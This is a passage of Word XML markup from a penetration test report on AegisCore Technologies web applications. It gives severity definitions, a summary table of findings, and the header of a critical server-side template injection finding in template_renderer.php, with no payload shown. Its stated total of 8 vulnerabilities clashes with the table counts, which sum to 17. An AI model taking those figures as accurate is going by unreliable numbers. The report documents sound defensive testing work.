                      <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                      <w:sz w:val="20"/>
                      <w:szCs w:val="20"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r w:rsidRPr="00D77DFE">
                    <w:rPr>
                      <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                      <w:sz w:val="20"/>
                      <w:szCs w:val="20"/>
                    </w:rPr>
                    <w:t>Moderate impact. Exploitable with some effort or partial access. May need user interaction.</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
          </w:tbl>
          <w:p w14:paraId="34C48092" w14:textId="77777777" w:rsidR="006F08D7" w:rsidRPr="00D77DFE" w:rsidRDefault="006F08D7" w:rsidP="00C420B0">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:ind w:firstLine="567"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="997" w:type="pct"/>
            <w:tcMar>
              <w:top w:w="0" w:type="dxa"/>
              <w:left w:w="108" w:type="dxa"/>
              <w:bottom w:w="0" w:type="dxa"/>
              <w:right w:w="108" w:type="dxa"/>
            </w:tcMar>
            <w:hideMark/>
          </w:tcPr>
          <w:tbl>
            <w:tblPr>
              <w:tblW w:w="1243" w:type="dxa"/>
              <w:tblCellSpacing w:w="15" w:type="dxa"/>
              <w:tblCellMar>
                <w:top w:w="15" w:type="dxa"/>
                <w:left w:w="15" w:type="dxa"/>
                <w:bottom w:w="15" w:type="dxa"/>
                <w:right w:w="15" w:type="dxa"/>
              </w:tblCellMar>
              <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
            </w:tblPr>
            <w:tblGrid>
              <w:gridCol w:w="1243"/>
            </w:tblGrid>
            <w:tr w:rsidR="006F08D7" w:rsidRPr="00D77DFE" w14:paraId="1F9DD67F" w14:textId="77777777" w:rsidTr="00FA5020">
              <w:trPr>
                <w:trHeight w:val="1610"/>
                <w:tblCellSpacing w:w="15" w:type="dxa"/>
              </w:trPr>
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="0" w:type="auto"/>
                  <w:vAlign w:val="center"/>
                  <w:hideMark/>
                </w:tcPr>
                <w:p w14:paraId="71853DB9" w14:textId="77777777" w:rsidR="006F08D7" w:rsidRPr="00D77DFE" w:rsidRDefault="006F08D7" w:rsidP="00FA5020">
                  <w:pPr>
                    <w:framePr w:hSpace="180" w:wrap="around" w:vAnchor="text" w:hAnchor="text"/>
                    <w:spacing w:after="0"/>
                    <w:rPr>
                      <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                      <w:sz w:val="20"/>
                      <w:szCs w:val="20"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r w:rsidRPr="00D77DFE">
                    <w:rPr>
                      <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                      <w:sz w:val="20"/>
                      <w:szCs w:val="20"/>
                    </w:rPr>
                    <w:t>Major impact. Exploitable remotely or by low-privileged users. Fix or patch usually available.</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
          </w:tbl>
          <w:p w14:paraId="320CA1C0" w14:textId="77777777" w:rsidR="006F08D7" w:rsidRPr="00D77DFE" w:rsidRDefault="006F08D7" w:rsidP="00C420B0">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:ind w:firstLine="567"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="996" w:type="pct"/>
            <w:tcMar>
              <w:top w:w="0" w:type="dxa"/>
              <w:left w:w="108" w:type="dxa"/>
              <w:bottom w:w="0" w:type="dxa"/>
              <w:right w:w="108" w:type="dxa"/>
            </w:tcMar>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="64DD1BF0" w14:textId="1B6D6228" w:rsidR="006F08D7" w:rsidRPr="00D77DFE" w:rsidRDefault="006F08D7" w:rsidP="00FA5020">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D77DFE">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Severe impact. Easy to exploit, remote, no patch available. May lead to full system compromise or data breach.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="033D09F3" w14:textId="77777777" w:rsidR="006923B6" w:rsidRPr="00D77DFE" w:rsidRDefault="006923B6" w:rsidP="006923B6">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="45E03F6E" w14:textId="77777777" w:rsidR="006923B6" w:rsidRPr="00D77DFE" w:rsidRDefault="006923B6" w:rsidP="006923B6">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="09912D26" w14:textId="77777777" w:rsidR="006923B6" w:rsidRPr="00D77DFE" w:rsidRDefault="006923B6" w:rsidP="009E5B3F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="56C28AED" w14:textId="58F2F1BC" w:rsidR="006F08D7" w:rsidRPr="00D77DFE" w:rsidRDefault="000C1F7F" w:rsidP="009E5B3F">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="189" w:name="_Toc223521151"/>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>6.</w:t>
      </w:r>
      <w:r w:rsidR="006F08D7" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidR="006923B6" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
      <w:r w:rsidR="006F08D7" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:bookmarkStart w:id="190" w:name="_Toc228687494"/>
      <w:bookmarkStart w:id="191" w:name="_Toc341868330"/>
      <w:bookmarkStart w:id="192" w:name="_Toc486603938"/>
      <w:bookmarkStart w:id="193" w:name="_Toc486605068"/>
      <w:bookmarkStart w:id="194" w:name="_Toc486846872"/>
      <w:bookmarkStart w:id="195" w:name="_Toc507421627"/>
      <w:r w:rsidR="006F08D7" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Summary</w:t>
      </w:r>
      <w:bookmarkEnd w:id="189"/>
      <w:bookmarkEnd w:id="190"/>
      <w:bookmarkEnd w:id="191"/>
      <w:bookmarkEnd w:id="192"/>
      <w:bookmarkEnd w:id="193"/>
      <w:bookmarkEnd w:id="194"/>
      <w:bookmarkEnd w:id="195"/>
    </w:p>
    <w:p w14:paraId="00588616" w14:textId="44D70089" w:rsidR="006F08D7" w:rsidRPr="00D77DFE" w:rsidRDefault="006F08D7" w:rsidP="000B53DF">
      <w:pPr>
        <w:spacing w:before="240" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="567"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>This penetration test was conducted on the</w:t>
      </w:r>
      <w:r w:rsidR="00FC4E52" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> AegisCore Technologies</w:t>
      </w:r>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve"> web applications to assess the overall security posture, identify vulnerabilities, and recommend mitigation strategies. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34E0502E" w14:textId="2630E797" w:rsidR="001917CF" w:rsidRDefault="006F08D7" w:rsidP="00EA3D53">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:b/>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>The testing focused on authenticated and unauthenticated user roles and covered key areas including input validation, access control, session management, and server-side logic.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75559E10" w14:textId="2ECE214D" w:rsidR="00686E5B" w:rsidRPr="00D77DFE" w:rsidRDefault="00686E5B" w:rsidP="00686E5B">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:b/>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:b/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Total: 8 Vulnerabilities</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblpPr w:leftFromText="180" w:rightFromText="180" w:vertAnchor="text" w:horzAnchor="margin" w:tblpXSpec="center" w:tblpY="636"/>
        <w:tblW w:w="9919" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1795"/>
        <w:gridCol w:w="1600"/>
        <w:gridCol w:w="1861"/>
        <w:gridCol w:w="2380"/>
        <w:gridCol w:w="2283"/>
      </w:tblGrid>
      <w:tr w:rsidR="00F25B87" w:rsidRPr="00D77DFE" w14:paraId="0AA918B3" w14:textId="77777777" w:rsidTr="00F25B87">
        <w:trPr>
          <w:trHeight w:val="406"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1795" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="13CCDD8D" w14:textId="77777777" w:rsidR="00F25B87" w:rsidRPr="00D77DFE" w:rsidRDefault="00F25B87" w:rsidP="00F25B87">
            <w:pPr>
              <w:spacing w:after="200" w:line="360" w:lineRule="auto"/>
              <w:ind w:firstLine="567"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:b/>
                <w:color w:val="C00000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D77DFE">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:b/>
                <w:color w:val="C00000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Critical</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1600" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="355C1934" w14:textId="77777777" w:rsidR="00F25B87" w:rsidRPr="00D77DFE" w:rsidRDefault="00F25B87" w:rsidP="00F25B87">
            <w:pPr>
              <w:spacing w:after="200" w:line="360" w:lineRule="auto"/>
              <w:ind w:firstLine="567"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:b/>
                <w:color w:val="FF0000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D77DFE">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:b/>
                <w:color w:val="FF0000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>High</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1861" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="293FB576"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color w:val="FFFF00"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Medium</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2380" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0C2133FB"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color w:val="00B050"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Low</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2283" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="70D3DBED" w14:textId="77777777" w:rsidR="00F25B87" w:rsidRPr="00D77DFE" w:rsidRDefault="00F25B87" w:rsidP="00F25B87">
            <w:pPr>
              <w:spacing w:after="200" w:line="360" w:lineRule="auto"/>
              <w:ind w:firstLine="567"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:b/>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D77DFE">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:b/>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Info</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F25B87" w:rsidRPr="00D77DFE" w14:paraId="4D8849AD" w14:textId="77777777" w:rsidTr="00F25B87">
        <w:trPr>
          <w:trHeight w:val="416"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1795" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="14253969"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2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1600" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="73183554"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7</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1861" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="02C2BC99"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8</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2380" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="03C9EE69"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0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2283" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="74CBE7CB" w14:textId="77777777" w:rsidR="00F25B87" w:rsidRPr="00D77DFE" w:rsidRDefault="00F25B87" w:rsidP="00F25B87">
            <w:pPr>
              <w:spacing w:after="20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0</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="3E1C19CD" w14:textId="4E2F44E3" w:rsidR="00F25B87" w:rsidRPr="00D77DFE" w:rsidRDefault="00686E5B" w:rsidP="00686E5B">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Table 6.5: Vulnerabilities in the report</w:t>
      </w:r>
      <w:r w:rsidR="00AC2949">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="464FEE20" w14:textId="77777777" w:rsidR="00686E5B" w:rsidRDefault="00686E5B" w:rsidP="00F25B87">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:b/>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="65B50923" w14:textId="77777777" w:rsidR="00C13182" w:rsidRDefault="00C13182" w:rsidP="00F25B87">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:b/>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="78A961AF" w14:textId="77777777" w:rsidR="00C13182" w:rsidRPr="00D77DFE" w:rsidRDefault="00C13182" w:rsidP="00F25B87">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:b/>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="716F64AC" w14:textId="77777777" w:rsidR="001917CF" w:rsidRDefault="001917CF" w:rsidP="009E5B3F">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:b/>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7140955C" w14:textId="77777777" w:rsidR="00C13182" w:rsidRDefault="00C13182" w:rsidP="009E5B3F">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:b/>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="63A123DB" w14:textId="77777777" w:rsidR="00C13182" w:rsidRPr="00D77DFE" w:rsidRDefault="00C13182" w:rsidP="009E5B3F">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:b/>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="13609D4F" w14:textId="15156EFD" w:rsidR="000B53DF" w:rsidRPr="00C13182" w:rsidRDefault="00F469EC" w:rsidP="00C13182">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="196" w:name="_Toc223521152"/>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>6.</w:t>
      </w:r>
      <w:r w:rsidR="000B53DF" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidR="006923B6" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>5</w:t>
      </w:r>
      <w:r w:rsidR="000B53DF" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>. Technical Findings</w:t>
      </w:r>
      <w:bookmarkEnd w:id="196"/>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblpPr w:leftFromText="180" w:rightFromText="180" w:vertAnchor="page" w:horzAnchor="margin" w:tblpXSpec="center" w:tblpY="2430"/>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C13182" w:rsidRPr="00D77DFE" w14:paraId="400517FF" w14:textId="77777777" w:rsidTr="00C13182">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638E710"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hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:color w:val="1F497D"/>
              </w:rPr>
              <w:t>SSTI in template_renderer.php</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C13182" w:rsidRPr="00D77DFE" w14:paraId="6604865F" w14:textId="77777777" w:rsidTr="00C13182">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E765A8B"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D7C5638"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C13182" w:rsidRPr="00D77DFE" w14:paraId="248FFC19" w14:textId="77777777" w:rsidTr="00C13182">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6A3D728" w14:textId="77777777" w:rsidR="00C13182" w:rsidRPr="00D77DFE" w:rsidRDefault="00C13182" w:rsidP="00C13182">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VUL_01</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68201E8" w14:textId="77777777" w:rsidR="00C13182" w:rsidRPr="00D77DFE" w:rsidRDefault="00C13182" w:rsidP="00C13182">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:ind w:firstLine="567"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:noProof/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D77DFE">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:noProof/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <mc:AlternateContent>
                <mc:Choice Requires="wps">
                  <w:drawing>
                    <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251780096" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="488249C1" wp14:editId="49543E10">
                      <wp:simplePos x="0" y="0"/>
                      <wp:positionH relativeFrom="column">
                        <wp:posOffset>988089</wp:posOffset>
                      </wp:positionH>
                      <wp:positionV relativeFrom="paragraph">
                        <wp:posOffset>46193</wp:posOffset>
                      </wp:positionV>
                      <wp:extent cx="1597660" cy="127635"/>
                      <wp:effectExtent l="7620" t="6350" r="13970" b="8890"/>
                      <wp:wrapNone/>
                      <wp:docPr id="314219284" name="Rectangle: Rounded Corner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C00000"/>
                              </a:solidFill>
                              <a:ln w="9525">
                                <a:solidFill>
                                  <a:schemeClr val="accent2">
                                    <a:lumMod val="100000"/>
                                    <a:lumOff val="0"/>
                                  </a:schemeClr>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3BE002" id="Rectangle: Rounded Corners 6" o:spid="_x0000_s1026" style="position:absolute;margin-left:77.8pt;margin-top:3.65pt;width:125.8pt;height:10.0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" fillcolor="#c00000" strokecolor="#e97132 [3205]">
                      <v:path arrowok="t"/>
                    </v:roundrect>
                  </w:pict>
                </mc:Fallback>
              </mc:AlternateContent>
            </w:r>
            <w:r w:rsidRPr="00D77DFE">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:b/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Critical</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C13182" w:rsidRPr="00D77DFE" w14:paraId="229A6DD8" w14:textId="77777777" w:rsidTr="00C13182">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2C70441"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9.9</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7FAFBCA" w14:textId="77777777" w:rsidR="00C13182" w:rsidRPr="00D77DFE" w:rsidRDefault="00C13182" w:rsidP="00C13182">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C13182" w:rsidRPr="00D77DFE" w14:paraId="25148048" w14:textId="77777777" w:rsidTr="00C13182">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974BBCE" w14:textId="77777777" w:rsidR="00C13182" w:rsidRPr="00D77DFE" w:rsidRDefault="00C13182" w:rsidP="00C13182">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/S:C/C:H/</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E559A7D" w14:textId="77777777" w:rsidR="00C13182" w:rsidRPr="00D77DFE" w:rsidRDefault="00C13182" w:rsidP="00C13182">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CWE-1336: Improper Neutralization of Special Elements Used in a Template Engine</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C13182" w:rsidRPr="00D77DFE" w14:paraId="33F8864B" w14:textId="77777777" w:rsidTr="00C13182">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E8A1FF4" w14:textId="77777777" w:rsidR="00C13182" w:rsidRPr="00D77DFE" w:rsidRDefault="00C13182" w:rsidP="00C13182">
            <w:pPr>
